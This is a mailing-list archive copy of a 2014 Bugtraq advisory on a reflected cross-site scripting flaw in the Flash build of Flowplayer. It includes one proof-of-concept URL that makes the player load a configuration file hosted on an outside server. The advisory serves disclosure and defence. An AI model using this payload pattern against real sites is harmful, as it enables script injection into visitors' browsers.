[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Reflected Cross-Site Scripting (XSS) in Flash Version of Flowplayer

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Reflected Cross-Site Scripting (XSS) in Flash Version of Flowplayer
From: subs@xxxxxxxxxxxx
Date: Tue, 4 Nov 2014 18:15:29 GMT

Description:
The flash file accept its configuration via a JSON object. This object can be 
passed directly or via a file.
The old version of this flash file was vulnerable because of loading insecure 
external flash files. The latest version and the previous ones are also 
vulnerable because of lack of encoding/validation in the parameters that are 
used in externalInterface.call.
Both of these issues have been included in the flowplayer.js file. 
This file can be used like this:
/flowplayer-3.2.18.swf?config=http://0me.me/demo/xss/flowplayer/flowplayer.js

Reference:
https://github.com/flowplayer/flash/issues/263

Prev by Date: Call for Papers - WorldCIST'15 - Best papers published in JCR/SCI journals
Next by Date: [security bulletin] HPSBUX03162 SSRT101767 rev.2 - HP-UX Running OpenSSL, Remote Denial of Service (DoS), Unauthorized Access, Man-in-the-Middle (MitM) Attack
Previous by thread: Call for Papers - WorldCIST'15 - Best papers published in JCR/SCI journals
Next by thread: [security bulletin] HPSBUX03162 SSRT101767 rev.2 - HP-UX Running OpenSSL, Remote Denial of Service (DoS), Unauthorized Access, Man-in-the-Middle (MitM) Attack
Index(es):
- Date
- Thread